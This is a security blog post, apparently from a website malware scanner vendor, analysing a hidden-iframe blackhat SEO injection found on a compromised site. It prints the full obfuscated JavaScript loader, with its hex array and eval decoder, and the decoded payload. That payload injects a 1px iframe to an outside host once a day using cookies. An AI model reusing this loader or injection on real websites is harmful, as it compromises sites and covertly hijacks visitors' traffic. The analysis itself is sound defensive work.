Hidden iframes still popular blackhat SEO technique to drive "unique visitors"
Another victim of malicious hidden iframe injection was detected today with Online Website Malware Scanner. The compromised company's website not only offers IT security services but it shared its traffic with website related to completely another industry(Thailand website with pharma products).
This particular case, as other similar attacks, is likely to be a part of paid "iframe-traffic shop" blackhat SEO services. Customer buys visitors to his website to improve search engine ranking. The .php file linked in the iframe appears doing nothing and contained "OK" string only (at the time this article was written). The name clk.php is obviously a click-counter method to build the reports and present the "customers". Decoded payload injects the hidden iframe once in 24 hours period to generate "unique visitors" traffic.
This particular case, as other similar attacks, is likely to be a part of paid "iframe-traffic shop" blackhat SEO services. Customer buys visitors to his website to improve search engine ranking. The .php file linked in the iframe appears doing nothing and contained "OK" string only (at the time this article was written). The name clk.php is obviously a click-counter method to build the reports and present the "customers". Decoded payload injects the hidden iframe once in 24 hours period to generate "unique visitors" traffic.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources(websites).
Website malware scanner report
Submission date: Mon Apr 29 06:44:07 2013
Infected website's files: 10
Quttera | Online Website Malware Scanner |
Malware entry
Malware entry details.
Beautified script
- ss = eval("Str" + "ing");
- d = document;
- a ="68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,69,79,74,67,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,69,79,74,67,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,68,71,74,6f,71,74,67,6e,6b,68,67,30,70,67,76,31,6b,70,78,67,70,76,31,65,6e,6d,30,72,6a,72,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,72,71,75,6b,76,6b,71,70,22,3f,22,29,63,64,75,71,6e,77,76,67,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,64,71,74,66,67,74,22,3f,22,29,32,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,6a,67,6b,69,6a,76,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,79,6b,66,76,6a,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,6e,67,68,76,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,76,71,72,22,3f,22,29,33,72,7a,29,3d,f,c,f,c,22,22,22,22,6b,68,22,2a,23,66,71,65,77,6f,67,70,76,30,69,67,76,47,6e,67,6f,67,70,76,44,7b,4b,66,2a,29,69,79,74,67,29,2b,2b,22,7d,f,c,22,22,22,22,22,22,22,22,66,71,65,77,6f,67,70,76,30,79,74,6b,76,67,2a,29,3e,66,6b,78,22,6b,66,3f,5e,29,69,79,74,67,5e,29,40,3e,31,66,6b,78,40,29,2b,3d,f,c,22,22,22,22,22,22,22,22,66,71,65,77,6f,67,70,76,30,69,67,76,47,6e,67,6f,67,70,76,44,7b,4b,66,2a,29,69,79,74,67,29,2b,30,63,72,72,67,70,66,45,6a,6b,6e,66,2a,69,79,74,67,2b,3d,f,c,22,22,22,22,7f,f,c,7f,f,c,68,77,70,65,76,6b,71,70,22,55,67,76,45,71,71,6d,6b,67,2a,65,71,71,6d,6b,67,50,63,6f,67,2e,65,71,71,6d,6b,67,58,63,6e,77,67,2e,70,46,63,7b,75,2e,72,63,76,6a,2b,22,7d,f,c,22,78,63,74,22,76,71,66,63,7b,22,3f,22,70,67,79,22,46,63,76,67,2a,2b,3d,f,c,22,78,63,74,22,67,7a,72,6b,74,67,22,3f,22,70,67,79,22,46,63,76,67,2a,2b,3d,f,c,22,6b,68,22,2a,70,46,63,7b,75,3f,3f,70,77,6e,6e,22,7e,7e,22,70,46,63,7b,75,3f,3f,32,2b,22,70,46,63,7b,75,3f,33,3d,f,c,22,67,7a,72,6b,74,67,30,75,67,76,56,6b,6f,67,2a,76,71,66,63,7b,30,69,67,76,56,6b,6f,67,2a,2b,22,2d,22,35,38,32,32,32,32,32,2c,34,36,2c,70,46,63,7b,75,2b,3d,f,c,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,22,3f,22,65,71,71,6d,6b,67,50,63,6f,67,2d,24,3f,24,2d,67,75,65,63,72,67,2a,65,71,71,6d,6b,67,58,63,6e,77,67,2b,f,c,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,2d,22,24,3d,67,7a,72,6b,74,67,75,3f,24,22,2d,22,67,7a,72,6b,74,67,30,76,71,49,4f,56,55,76,74,6b,70,69,2a,2b,22,2d,22,2a,2a,72,63,76,6a,2b,22,41,22,24,3d,22,72,63,76,6a,3f,24,22,2d,22,72,63,76,6a,22,3c,22,24,24,2b,3d,f,c,7f,f,c,68,77,70,65,76,6b,71,70,22,49,67,76,45,71,71,6d,6b,67,2a,22,70,63,6f,67,22,2b,22,7d,f,c,22,78,63,74,22,75,76,63,74,76,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6b,70,66,67,7a,51,68,2a,22,70,63,6f,67,22,2d,22,24,3f,24,22,2b,3d,f,c,22,78,63,74,22,6e,67,70,22,3f,22,75,76,63,74,76,22,2d,22,70,63,6f,67,30,6e,67,70,69,76,6a,22,2d,22,33,3d,f,c,22,6b,68,22,2a,22,2a,22,23,75,76,63,74,76,22,2b,22,28,28,f,c,22,2a,22,70,63,6f,67,22,23,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,75,77,64,75,76,74,6b,70,69,2a,22,32,2e,22,70,63,6f,67,30,6e,67,70,69,76,6a,22,2b,22,2b,22,2b,f,c,22,7d,f,c,22,74,67,76,77,74,70,22,70,77,6e,6e,3d,f,c,22,7f,f,c,22,6b,68,22,2a,22,75,76,63,74,76,22,3f,3f,22,2f,33,22,2b,22,74,67,76,77,74,70,22,70,77,6e,6e,3d,f,c,22,78,63,74,22,67,70,66,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6b,70,66,67,7a,51,68,2a,22,24,3d,24,2e,22,6e,67,70,22,2b,3d,f,c,22,6b,68,22,2a,22,67,70,66,22,3f,3f,22,2f,33,22,2b,22,67,70,66,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6e,67,70,69,76,6a,3d,f,c,22,74,67,76,77,74,70,22,77,70,67,75,65,63,72,67,2a,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,75,77,64,75,76,74,6b,70,69,2a,22,6e,67,70,2e,22,67,70,66,22,2b,22,2b,3d,f,c,7f,f,c,6b,68,22,2a,70,63,78,6b,69,63,76,71,74,30,65,71,71,6d,6b,67,47,70,63,64,6e,67,66,2b,f,c,7d,f,c,6b,68,2a,49,67,76,45,71,71,6d,6b,67,2a,29,78,6b,75,6b,76,67,66,61,77,73,29,2b,3f,3f,37,37,2b,7d,7f,67,6e,75,67,7d,55,67,76,45,71,71,6d,6b,67,2a,29,78,6b,75,6b,76,67,66,61,77,73,29,2e,22,29,37,37,29,2e,22,29,33,29,2e,22,29,31,29,2b,3d,f,c,f,c,7c,7c,7c,68,68,68,2a,2b,3d,f,c,7f,f,c,7f".split(",");
- for (i = 0; i < a.length; i++) {
- a[i] = parseInt(a[i], 16) - (5 - 3);
- }
- try {
- d.body--
- } catch (q) {
- zz = 0;
- }
- try {
- zz &= 2
- } catch (q) {
- zz = 1;
- }
- if (!zz) if (window.document) eval(ss.fromCharCode.apply(ss, a));
Malicious payload
Decoded payload generates hidden iframe to http://formorelife.net/invent/clk.php
Here the cookies are used to inject the iframe once in 24 hours period.
- function zzzfff() {
- var gwre = document.createElement('iframe');
- gwre.src = 'http://formorelife.net/invent/clk.php';
- gwre.style.position = 'absolute';
- gwre.style.border = '0';
- gwre.style.height = '1px';
- gwre.style.width = '1px';
- gwre.style.left = '1px';
- gwre.style.top = '1px';
- if (!document.getElementById('gwre')) {
- document.write('<div id=\'gwre\'></div>');
- document.getElementById('gwre').appendChild(gwre);
- }
- }
Here the cookies are used to inject the iframe once in 24 hours period.
-
function SetCookie(cookieName, cookieValue, nDays, path) {
-
var today = new Date();
-
var expire = new Date();
-
if (nDays == null || nDays == 0) nDays = 1;
-
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
-
document.cookie = cookieName + "=" + escape(cookieValue)
-
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
-
}
-
-
function GetCookie(name) {
-
var start = document.cookie.indexOf(name + "=");
-
var len = start + name.length + 1;
-
if ((!start) &&
-
(name != document.cookie.substring(0, name.length)))
-
{
-
return null;
-
}
-
-
if (start == -1) return null;
-
var end = document.cookie.indexOf(";", len);
-
if (end == -1) end = document.cookie.length;
-
return unescape(document.cookie.substring(len, end));
-
}
-
-
if (navigator.cookieEnabled)
-
{
-
if (GetCookie('visited_uq') == 55) {} else {
-
SetCookie('visited_uq', '55', '1', '/');
-
zzzfff();
-
}
-
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length)))
{
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled)
{
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}
Malware clean-up
Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.
No comments:
Post a Comment